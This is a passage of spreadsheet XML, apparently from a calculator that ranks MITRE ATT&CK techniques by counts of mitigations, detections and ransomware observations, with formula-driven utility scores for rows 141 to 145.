        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>9.4766666666666666E-2</v>
      </c>
      <c r="B141" s="25">
        <f>SUM(H141,M141,V141)*(1+SUM(AE141,AG141,AI141,AK141,AM141))</f>
        <v>0.6143333333333334</v>
      </c>
      <c r="C141" s="25" t="s">
        <v>649</v>
      </c>
      <c r="D141" s="25" t="s">
        <v>165</v>
      </c>
      <c r="E141" s="25" t="s">
        <v>650</v>
      </c>
      <c r="F141" s="51">
        <v>1</v>
      </c>
      <c r="G141" s="51">
        <v>1</v>
      </c>
      <c r="H141" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I141">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J141">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K141">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L141">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M141" s="25">
        <v>0</v>
      </c>
      <c r="N141" s="51">
        <v>0</v>
      </c>
      <c r="O141" s="51">
        <v>0</v>
      </c>
      <c r="P141" s="51">
        <v>0</v>
      </c>
      <c r="Q141" s="51">
        <v>0</v>
      </c>
      <c r="R141" s="53" t="s">
        <v>651</v>
      </c>
      <c r="S141" s="51">
        <v>15</v>
      </c>
      <c r="T141" s="51" t="s">
        <v>652</v>
      </c>
      <c r="U141" s="51">
        <v>23</v>
      </c>
      <c r="V141" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.36190476190476195</v>
      </c>
      <c r="W141">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>38</v>
      </c>
      <c r="X141">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.69090909090909092</v>
      </c>
      <c r="Y141">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.69090909090909092</v>
      </c>
      <c r="Z141">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>0</v>
      </c>
      <c r="AA141">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0</v>
      </c>
      <c r="AB141">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AC141" s="29" t="s">
        <v>653</v>
      </c>
      <c r="AD141" s="25" t="str" cm="1">
        <f t="array" ref="AD141">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC141)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE141" s="25">
        <f>IF(AD141="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF141" s="25" t="str" cm="1">
        <f t="array" ref="AF141">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC141)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AG141" s="25">
        <f>IF(AF141="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH141" s="25" t="str" cm="1">
        <f t="array" ref="AH141">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC141)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI141" s="25">
        <f>IF(AH141="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ141" s="25" t="str" cm="1">
        <f t="array" ref="AJ141">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC141)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK141" s="25">
        <f>IF(AJ141="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL141" s="25" t="str" cm="1">
        <f t="array" ref="AL141">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC141)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM141" s="25">
        <f>IF(AL141="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN141" s="59">
        <v>1</v>
      </c>
      <c r="AO141" s="51">
        <v>1</v>
      </c>
      <c r="AP141" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>9.4766666666666666E-2</v>
      </c>
      <c r="AQ141" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.20477777777777781</v>
      </c>
      <c r="AR141" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.20477777777777781</v>
      </c>
      <c r="AS141" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AT141" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AU14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42" spans="1:47" ht="48">
      <c r="A142" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>9.4766666666666666E-2</v>
      </c>
      <c r="B142" s="25">
        <f>SUM(H142,M142,V142)*(1+SUM(AE142,AG142,AI142,AK142,AM142))</f>
        <v>0.6143333333333334</v>
      </c>
      <c r="C142" s="25" t="s">
        <v>654</v>
      </c>
      <c r="D142" s="25" t="s">
        <v>233</v>
      </c>
      <c r="E142" s="25" t="s">
        <v>655</v>
      </c>
      <c r="F142" s="51">
        <v>1</v>
      </c>
      <c r="G142" s="51">
        <v>1</v>
      </c>
      <c r="H142" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I142">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J142">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K142">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L142">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M142" s="25">
        <v>0</v>
      </c>
      <c r="N142" s="51">
        <v>0</v>
      </c>
      <c r="O142" s="51">
        <v>5</v>
      </c>
      <c r="P142" s="51">
        <v>1</v>
      </c>
      <c r="Q142" s="51">
        <v>0</v>
      </c>
      <c r="R142" s="52" t="s">
        <v>656</v>
      </c>
      <c r="S142" s="51">
        <v>13</v>
      </c>
      <c r="T142" s="52" t="s">
        <v>657</v>
      </c>
      <c r="U142" s="51">
        <v>22</v>
      </c>
      <c r="V142" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.36190476190476195</v>
      </c>
      <c r="W142">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>35</v>
      </c>
      <c r="X142">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.63636363636363635</v>
      </c>
      <c r="Y142">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.63636363636363635</v>
      </c>
      <c r="Z142">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>6</v>
      </c>
      <c r="AA142">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.06</v>
      </c>
      <c r="AB142">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.06</v>
      </c>
      <c r="AC142" s="29" t="s">
        <v>658</v>
      </c>
      <c r="AD142" s="25" t="str" cm="1">
        <f t="array" ref="AD142">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC142)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE142" s="25">
        <f>IF(AD142="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF142" s="25" t="str" cm="1">
        <f t="array" ref="AF142">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC142)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG142" s="25">
        <f>IF(AF142="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH142" s="25" t="str" cm="1">
        <f t="array" ref="AH142">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC142)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI142" s="25">
        <f>IF(AH142="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ142" s="25" t="str" cm="1">
        <f t="array" ref="AJ142">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC142)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK142" s="25">
        <f>IF(AJ142="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL142" s="25" t="str" cm="1">
        <f t="array" ref="AL142">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC142)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM142" s="25">
        <f>IF(AL142="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN142" s="60">
        <v>1</v>
      </c>
      <c r="AO142" s="51">
        <v>1</v>
      </c>
      <c r="AP142" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>9.4766666666666666E-2</v>
      </c>
      <c r="AQ142" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.20477777777777781</v>
      </c>
      <c r="AR142" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.20477777777777781</v>
      </c>
      <c r="AS142" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AT142" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AU14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43" spans="1:47" ht="32.1">
      <c r="A143" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>4.6190476190476192E-2</v>
      </c>
      <c r="B143" s="25">
        <f>SUM(H143,M143,V143)*(1+SUM(AE143,AG143,AI143,AK143,AM143))</f>
        <v>0.46190476190476193</v>
      </c>
      <c r="C143" s="25" t="s">
        <v>659</v>
      </c>
      <c r="D143" s="25" t="s">
        <v>175</v>
      </c>
      <c r="E143" s="25" t="s">
        <v>660</v>
      </c>
      <c r="F143" s="51">
        <v>1</v>
      </c>
      <c r="G143" s="51">
        <v>1</v>
      </c>
      <c r="H143" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I143">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J143">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K143">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L143">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M143" s="25">
        <v>0</v>
      </c>
      <c r="N143" s="51">
        <v>0</v>
      </c>
      <c r="O143" s="51">
        <v>2</v>
      </c>
      <c r="P143" s="51">
        <v>0</v>
      </c>
      <c r="Q143" s="51">
        <v>0</v>
      </c>
      <c r="R143" s="52" t="s">
        <v>661</v>
      </c>
      <c r="S143" s="51">
        <v>16</v>
      </c>
      <c r="T143" s="51" t="s">
        <v>177</v>
      </c>
      <c r="U143" s="51">
        <v>21</v>
      </c>
      <c r="V143" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.36190476190476195</v>
      </c>
      <c r="W143">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>37</v>
      </c>
      <c r="X143">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.67272727272727273</v>
      </c>
      <c r="Y143">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.67272727272727273</v>
      </c>
      <c r="Z143">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>2</v>
      </c>
      <c r="AA143">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.02</v>
      </c>
      <c r="AB143">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.02</v>
      </c>
      <c r="AC143" s="29" t="s">
        <v>178</v>
      </c>
      <c r="AD143" s="25" t="str" cm="1">
        <f t="array" ref="AD143">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC143)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE143" s="25">
        <f>IF(AD143="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF143" s="25" t="str" cm="1">
        <f t="array" ref="AF143">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC143)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AG143" s="25">
        <f>IF(AF143="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH143" s="25" t="str" cm="1">
        <f t="array" ref="AH143">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC143)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI143" s="25">
        <f>IF(AH143="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ143" s="25" t="str" cm="1">
        <f t="array" ref="AJ143">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC143)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK143" s="25">
        <f>IF(AJ143="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL143" s="25" t="str" cm="1">
        <f t="array" ref="AL143">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC143)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM143" s="25">
        <f>IF(AL143="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN143" s="52">
        <v>0</v>
      </c>
      <c r="AO143" s="51">
        <v>0</v>
      </c>
      <c r="AP143" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>4.6190476190476192E-2</v>
      </c>
      <c r="AQ143" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.15396825396825398</v>
      </c>
      <c r="AR143" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.15396825396825398</v>
      </c>
      <c r="AS143" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT143" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU14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44" spans="1:47">
      <c r="A144" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>4.6190476190476192E-2</v>
      </c>
      <c r="B144" s="25">
        <f>SUM(H144,M144,V144)*(1+SUM(AE144,AG144,AI144,AK144,AM144))</f>
        <v>0.46190476190476193</v>
      </c>
      <c r="C144" s="25" t="s">
        <v>662</v>
      </c>
      <c r="D144" s="25" t="s">
        <v>663</v>
      </c>
      <c r="E144" s="25" t="s">
        <v>89</v>
      </c>
      <c r="F144" s="51">
        <v>1</v>
      </c>
      <c r="G144" s="51">
        <v>1</v>
      </c>
      <c r="H144" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I144">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J144">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K144">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L144">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M144" s="25">
        <v>0</v>
      </c>
      <c r="N144" s="51">
        <v>0</v>
      </c>
      <c r="O144" s="51">
        <v>0</v>
      </c>
      <c r="P144" s="51">
        <v>0</v>
      </c>
      <c r="Q144" s="51">
        <v>0</v>
      </c>
      <c r="R144" s="51"/>
      <c r="S144" s="51">
        <v>12</v>
      </c>
      <c r="T144" s="52" t="s">
        <v>664</v>
      </c>
      <c r="U144" s="51">
        <v>26</v>
      </c>
      <c r="V144" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.36190476190476195</v>
      </c>
      <c r="W144">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>38</v>
      </c>
      <c r="X144">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.69090909090909092</v>
      </c>
      <c r="Y144">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.69090909090909092</v>
      </c>
      <c r="Z144">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>0</v>
      </c>
      <c r="AA144">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0</v>
      </c>
      <c r="AB144">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AC144" s="29" t="s">
        <v>665</v>
      </c>
      <c r="AD144" s="25" t="str" cm="1">
        <f t="array" ref="AD144">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC144)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE144" s="25">
        <f>IF(AD144="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF144" s="25" t="str" cm="1">
        <f t="array" ref="AF144">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC144)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG144" s="25">
        <f>IF(AF144="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH144" s="25" t="str" cm="1">
        <f t="array" ref="AH144">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC144)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI144" s="25">
        <f>IF(AH144="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ144" s="25" t="str" cm="1">
        <f t="array" ref="AJ144">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC144)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK144" s="25">
        <f>IF(AJ144="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL144" s="25" t="str" cm="1">
        <f t="array" ref="AL144">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC144)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM144" s="25">
        <f>IF(AL144="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN144" s="52">
        <v>0</v>
      </c>
      <c r="AO144" s="51">
        <v>0</v>
      </c>
      <c r="AP144" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>4.6190476190476192E-2</v>
      </c>
      <c r="AQ144" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.15396825396825398</v>
      </c>
      <c r="AR144" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.15396825396825398</v>
      </c>
      <c r="AS144" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT144" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU14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45" spans="1:47">
      <c r="A145" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>4.1190476190476194E-2</v>
      </c>
      <c r="B145" s="25">
        <f>SUM(H145,M145,V145)*(1+SUM(AE145,AG145,AI145,AK145,AM145))</f>
        <v>0.41190476190476194</v>
      </c>
      <c r="C145" s="25" t="s">
        <v>666</v>
      </c>
      <c r="D145" s="25" t="s">
        <v>663</v>
      </c>
      <c r="E145" s="25" t="s">
        <v>667</v>
      </c>
      <c r="F145" s="51">
        <v>1</v>
      </c>
      <c r="G145" s="51">
        <v>0</v>
      </c>
      <c r="H145" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.05</v>
      </c>
      <c r="I145">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J145">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K145">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0</v>
      </c>
      <c r="L145">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0</v>
      </c>
      <c r="M145" s="25">
        <v>0</v>
      </c>
      <c r="N145" s="51">
        <v>0</v>
      </c>
      <c r="O145" s="51">
        <v>0</v>
      </c>
      <c r="P145" s="51">
        <v>0</v>
      </c>
      <c r="Q145" s="51">
        <v>0</v>
      </c>
      <c r="R145" s="52" t="s">
        <v>668</v>
      </c>
      <c r="S145" s="51">
        <v>12</v>
      </c>
      <c r="T145" s="52" t="s">
        <v>664</v>
      </c>
      <c r="U145" s="51">
        <v>26</v>
      </c>
      <c r="V145" s="25">
